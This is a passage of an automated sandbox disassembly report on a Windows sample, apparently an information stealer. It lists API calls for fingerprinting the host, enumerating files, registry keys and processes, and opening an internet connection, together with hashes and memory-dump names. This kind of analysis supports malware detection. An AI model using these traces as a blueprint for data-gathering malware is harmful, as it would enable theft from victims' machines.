
ShellExecuteEx.SHELL32(0000003C), ref: 00411307

Strings

<, xrefs: 004112AC
C:\Windows\system32\rundll32.dll, xrefs: 004110BF
"" , xrefs: 004111DC
.dll, xrefs: 00411054

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 258d4ebfc66ed96dd19087c235080dee1f5f1bf45f7a0d4999c098e0e1a92ace
Instruction ID: ff393b419b3d9cd89bf84e2a65158e8723a283ad60ef2a05342f0777a40cb69c
Opcode Fuzzy Hash: 258d4ebfc66ed96dd19087c235080dee1f5f1bf45f7a0d4999c098e0e1a92ace
Instruction Fuzzy Hash: 19A124759101089ACB15FB91DC92FDEB739AF14304F51425FE10666095EF38ABCACFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,04376D08), ref: 0041244B

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 00412471
lstrcat.KERNEL32(?,?), ref: 00412490
lstrcat.KERNEL32(?,?), ref: 004124A4
lstrcat.KERNEL32(?,0436F9C8), ref: 004124B7
lstrcat.KERNEL32(?,?), ref: 004124CB
lstrcat.KERNEL32(?,04377470), ref: 004124DF

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F

Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: a8cdaff6348467220e46ecbe5bbad888972f2388953b3a41efaa7fa85cce1e20
Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
Opcode Fuzzy Hash: a8cdaff6348467220e46ecbe5bbad888972f2388953b3a41efaa7fa85cce1e20
Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
__aulldiv.LIBCMT ref: 00401218
__aulldiv.LIBCMT ref: 00401226
ExitProcess.KERNEL32 ref: 00401254

Strings

@, xrefs: 004011F3

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D

Uniqueness

Uniqueness Score: -1.00%

Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

lstrcat.KERNEL32(?,00000000), ref: 004129BA
lstrcat.KERNEL32(?,0041D888), ref: 004129D7
lstrcat.KERNEL32(?,04370AF0), ref: 004129EB
lstrcat.KERNEL32(?,0041D88C), ref: 004129FD

Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
Part of subcall function 00412570: FindFirstFileA.KERNEL32(?,?), ref: 004125A0

Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE

Strings

L0A, xrefs: 00412A22, 00412A51, 00412A73, 00412A25, 00412A54

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: L0A
API String ID: 2667927680-1482484291
Opcode ID: 2d500382a6aefc514482708f61bb6bbe5345368defb784e312ba9a838cac8a8b
Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
Opcode Fuzzy Hash: 2d500382a6aefc514482708f61bb6bbe5345368defb784e312ba9a838cac8a8b
Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
HeapAlloc.KERNEL32(00000000), ref: 0040127B
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
RegCloseKey.ADVAPI32(?), ref: 004012BF

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90

Uniqueness

Uniqueness Score: -1.00%

Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
HeapAlloc.KERNEL32(00000000), ref: 0041475B
RegOpenKeyExA.KERNEL32(80000002,04372C18,00000000,00020119,00000000), ref: 0041477B
RegQueryValueExA.KERNEL32(00000000,04377690,00000000,00000000,000000FF,000000FF), ref: 0041479C
RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,04372BE0,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,04376B88,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(04370860,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(043773F0,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0436D980,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(04370860,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: db845e602ca4035d7aa081759cb6d4516eb1caf2c095fc66c10f9847325819b9
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: db845e602ca4035d7aa081759cb6d4516eb1caf2c095fc66c10f9847325819b9
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

:h@, xrefs: 004065DD, 004065FD, 0040667F
@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04378208,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5c4.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c1ba8c443553381d6463a35b722fa011d7b81dea12db1d1612586ec36f60eff1
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: c1ba8c443553381d6463a35b722fa011d7b81dea12db1d1612586ec36f60eff1
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,04372BE0,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04376B88,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04377450,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04370A50), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04377450,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04370A50), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04370930,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,043769D8,00000000,?,0041D758,00000000,?,00000000,00000000,?,04377410,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,043769D8,00000000,?,0041D758,00000000,?,00000000,00000000,?,04377410,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,04377430,00000000,?,0041D76C,00000000,?,00000000,00000000,?,043769A8,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,04372C18,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04377690,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,043769F0,00000000,?,0041D774,00000000,?,00000000,00000000,?,043769C0), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,04373798,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04370BC0), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2496868143.0000000000448000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2496868143.000000000044B000.00000040.00000001.01000000.00000005.sdmpDownload File
